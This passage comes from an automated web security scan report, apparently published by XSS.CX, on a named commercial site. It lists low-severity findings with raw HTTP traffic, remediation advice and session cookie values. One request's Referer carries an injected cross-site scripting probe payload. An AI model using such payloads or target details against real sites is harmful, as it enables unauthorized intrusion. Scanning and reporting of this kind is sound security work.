User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 60

refererUrl=&username=username&password=password&_rememberme=

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 12:23:09 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=3A557A4F636D55A64BB5D243FAF74066; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 2589
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<script language="javascript">
function clearInput(e){
if(e.value=='username'||e.value=='password')
{e.value="";
}
}

</script>


                        <form id="loginForm" method="post">

...[SNIP]...

4.2. http://www.insideup.com/ppc/leadflow/voip10/project.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppc/leadflow/voip10/project.php HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 03:19:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=p1la5sqodaraa29n27bc9kika1; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/voip10/project.php was not found on this server.</p>

5. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

POST /login.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 60

refererUrl=&username=username&password=password&_rememberme=

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 12:23:09 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=3A557A4F636D55A64BB5D243FAF74066; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 2589
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<script language="javascript">
function clearInput(e){
if(e.value=='username'||e.value=='password')
{e.value="";
}
}

</script>


                        <form id="loginForm" method="post">

       
        <input type="hidden" name="refererUrl" value="">
...[SNIP]...
<div style="float:left;padding:0px 0 0 8px;">
                   
                       <input style="border:1px solid #CCCCCC;height:23px;width:110px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" />
                   
                   </div>
...[SNIP]...

6. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /ppc/leadflow/voip10/project.php?catId=110005&Company_Phone_System_VoIP&iusrc=gotxkw HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 03:19:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e8l3qquehfo26eqjaqt27if8q6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<td height="90" align="left">
                                                                               <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=109060517022">
                                                               <img src="http://www.insideup.com/ppc/tools/images/110005/04052010182003_5.jpg" width="126" height="49" />
...[SNIP]...
<td width="135" align="center" valign="top"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.insideup.com&size=L&use_flash=NO&use_transparent=NO...=en"></script><br /><a href="http://www.verisign.com/verisign-trust-seal" target="_blank" style="color:#000000; text-decoration:none; font:bold 7px verdana,sans-serif; letter-spacing:.5px; text-align:center; margin:0px; padding:0px;">ABOUT TRUST ONLINE</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1028748950/?label=SnlsCJqH2QEQlu3F6gM&guid=ON&script=0"/>
</div>
...[SNIP]...
<noscript>
<img src="http://pro.marinsm.com/tp?act=1&cid=zbygse58m0&script=no" >
</noscript>
...[SNIP]...

7. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The response dynamically includes the following scripts from other domains:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /ppc/leadflow/voip10/project.php?catId=110005&Company_Phone_System_VoIP&iusrc=gotxkw HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 03:19:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e8l3qquehfo26eqjaqt27if8q6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<td width="135" align="center" valign="top"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.insideup.com&size=L&use_flash=NO&use_transparent=NO...=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

8. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.insideup.com

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 03:19:26 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 11 Mar 2011 12:35:21 GMT
ETag: "1445f7-4a-49e3431fd1440"
Accept-Ranges: bytes
Content-Length: 74
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /searchvendor


User-agent: dotbot
Disallow: /


9. Content type incorrectly stated  previous
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


9.1. http://www.insideup.com/ppc/leadflow/style/blackdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/style/blackdot.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ppc/leadflow/style/blackdot.gif HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
Referer: http://www.insideup.com/ppc/leadflow/voip10/project.php?catId=110005&Company_Phone_System_VoIP&iusrc=gotxkw5cef3%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E347afe432cf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=h63k1472ckat3cpbjjlkfbfhe5

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 12:21:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/style/blackdot.gif was not found on this server.</p>

9.2. http://www.insideup.com/ppc/leadflow/voip10/project.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/voip10/project.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ppc/leadflow/voip10/project.php HTTP/1.1
Host: www.insideup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Mar 2011 03:19:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=p1la5sqodaraa29n27bc9kika1; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/voip10/project.php was not found on this server.</p>

9.3. http://www.insideup.com/updateCity.html  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /updateCity.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /updateCity.html?city=Albuquerque HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=3A557A4F636D55A64BB5D243FAF74066
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 12:23:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8

Albuquerque/New Mexico/

Report generated by XSS.CX at Sun Mar 13 07:24:20 CDT 2011.